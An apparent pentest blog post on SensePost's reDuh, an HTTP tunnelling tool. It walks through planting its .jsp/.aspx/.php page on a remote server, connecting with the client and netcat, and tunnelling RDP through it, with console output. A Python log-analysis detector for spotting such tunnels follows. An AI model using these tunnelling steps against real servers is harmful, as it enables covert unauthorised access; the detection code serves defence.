A bit more on sensepost's reDuh
SensePost's page on it: http://www.sensepost.com/research/reDuh/
reDuh comes with reDuh.jsp, .aspx, and .php pages. Work your magic to upload the page to the remote server. Once it's there you can connect to it with the reDuh client:
yomama@c0:~/pentest/webapp/reduh/reDuhClient$ sudo java -jar reDuhClient.jar
[Info]Querying remote web page for usable remote service port
[Info]Remote RPC port chosen as 42005
[Info]Attempting to start reDuh from Using service port 42005. Please wait...
[Info]reDuhClient service listener started on local port 1010
Once you are connected to the remote end, in another terminal connect to your local reDuh instance.
yomama@c0:~$ nc localhost 1010
Welcome to the reDuh command line
Commands are of the form [command]{options}
Available commands:
[usage] - This menu
[killReDuh] - terminates remote JSP process, and ends this client program
[DEBUG]<0|1|2> - Sets the verbosity
Successfully bound locally to port 4567. Awaiting connections.
In your other shell you should see something similar to this:
[Info]Caught new service connection on local port 1010
[Info]Successfully bound locally to port 4567. Awaiting connections.
Fire up your terminal server client and point it at localhost:4567
[Info]Requesting reDuh to create socket to
[Info]Successfully created socket 4567:
[Info]Localhost ====> (34 bytes read from local socket)
[Info]Caught data with sequenceNumber 0
[Info]Localhost <==== (11 bytes picked up from remote port)
[Info]Localhost ====> (386 bytes read from local socket)
[Info]Caught data with sequenceNumber 1
If all is working you'll see a shitload of HTTP traffic and eventually your RDP prompt.
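From the defender's side, the tell-tale sign of a tunnel like this is exactly what the walkthrough above shows: one client hammering a single server-side script page (a .jsp/.aspx/.php file) with a burst of requests, each carrying a small chunk of the wrapped session. The following is an added example, not reDuh code or anything from the SensePost page: a small Python detector that parses Common Log Format access-log lines and flags (client, script page) pairs that exceed a request-rate threshold in a sliding window. The log lines, paths, client addresses and thresholds are constructed for illustration.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Common Log Format: client ident user [timestamp] "METHOD path PROTO" status size
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*"')
SCRIPT_EXT = (".jsp", ".aspx", ".php")  # page types reDuh ships as

def parse_line(line):
    """Return (client, timestamp, method, path) or None if the line is not CLF."""
    m = LOG_RE.match(line)
    if not m:
        return None
    client, ts, method, path = m.groups()
    return client, datetime.strptime(ts, "%d/%b/%Y:%H:%M:%S %z"), method, path.split("?")[0]

def find_tunnel_bursts(lines, threshold=30, window_seconds=10):
    """Map (client, path) -> peak requests inside any `window_seconds` window,
    for script pages only, keeping entries at or above `threshold`."""
    hits = defaultdict(list)
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        client, when, _method, path = rec
        if path.lower().endswith(SCRIPT_EXT):
            hits[(client, path)].append(when)
    window = timedelta(seconds=window_seconds)
    flagged = {}
    for key, times in hits.items():
        times.sort()
        start, peak = 0, 0
        for end, t in enumerate(times):        # two-pointer sliding window
            while t - times[start] > window:
                start += 1
            peak = max(peak, end - start + 1)
        if peak >= threshold:
            flagged[key] = peak
    return flagged

def build_sample_log():
    """Constructed sample (not captured traffic): a few ordinary hits plus one
    client POSTing 40 times in 8 seconds to a single uploaded script page."""
    lines = [
        '10.0.0.5 - - [12/Mar/2010:10:00:00 +0000] "GET /index.jsp HTTP/1.1" 200 512',
        '10.0.0.5 - - [12/Mar/2010:10:00:30 +0000] "GET /login.php HTTP/1.1" 200 900',
        '10.0.0.7 - - [12/Mar/2010:10:01:00 +0000] "GET /static/logo.png HTTP/1.1" 200 3000',
    ]
    for i in range(40):
        sec = 1 + i // 5  # five requests per second, seconds 1..8
        lines.append(f'10.0.0.9 - - [12/Mar/2010:10:00:{sec:02d} +0000] '
                     f'"POST /uploads/reDuh.jsp HTTP/1.1" 200 {34 + i}')
    return lines
```

Tune `threshold` and `window_seconds` against a baseline of your own server's normal script-page traffic; a legitimate AJAX-heavy page can also poll frequently, so treat a hit as a lead to correlate with upload events and file-creation times in the web root, not as proof on its own.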
Glad to see it's still being used, and works. Was a bit of a rush job coding that :)